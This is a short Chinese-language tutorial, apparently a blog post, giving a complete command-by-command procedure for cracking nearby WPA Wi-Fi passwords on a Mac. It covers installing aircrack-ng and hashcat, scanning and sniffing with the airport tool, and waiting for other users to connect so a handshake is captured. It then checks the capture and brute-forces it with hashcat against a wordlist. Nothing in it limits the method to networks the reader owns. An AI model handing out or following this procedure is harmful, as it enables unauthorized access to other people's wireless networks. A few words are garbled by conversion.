1.安裝xcode,macport
2.安裝aircrack-ng
sudo port install aircrack-ng
3.安裝Hashcat
cd hashcat//進(jìn)入目錄sudo make
sudo make install //安裝hashcat
hashcat -V 如看到版本信息則安裝成功
4.安裝Hashcat-utils
cd hashcat-utils/src
make && mv *.bin ../bin
cd ../bin
sudo install cap2hccapx.bin /usr/local/bin/cap2hccapx
5.密碼生成器:Crunch 使用
這里有個可以下載,我沒用過,僅供參考密碼字典
6.獲取當(dāng)前網(wǎng)卡
ifconfig 例:我的en0
6.獲取周圍的WIFI
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
7.開始抓包,收集監(jiān)聽周圍無線網(wǎng)絡(luò)的數(shù)據(jù)
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 6
當(dāng)執(zhí)行以上命令,開始監(jiān)聽以后,Wifi的圖標(biāo)會變成一個小眼睛,監(jiān)聽久一點(其實就是一個等待別人連接wifi的過程,等待時間越長成功率越高),然后使用ctrl+c停止監(jiān)聽,數(shù)據(jù)保存到/tmp/airportSniffxxxx.cap文件中
8. 查看.cap文件
sudo aircrack-ng xxxxx.cap
如果Encryption值為WPA(1 handshake) 宇弛,說明抓取成功, 否者跳到要重新抓取(在監(jiān)聽的過程中如果有用戶登陸這個wifi,那么包就會被我們截獲,如果用戶一直沒有登陸到這個wifi,我們就還要繼續(xù)等待監(jiān)聽,盡量在手機(jī)或者手提電腦所用高峰期開啟捕獲,這樣捕獲握手(handshake)的幾率比較高)
9.將.cap轉(zhuǎn)換為.hccapx
cd到.cap存放目錄 cap2hccapx xx.cap xx.hccapx
10.爆破
hashcat -m 2500 xx.hccapx pwd.txt(pwd.txt為爆破字典 --show可顯示內(nèi)容)
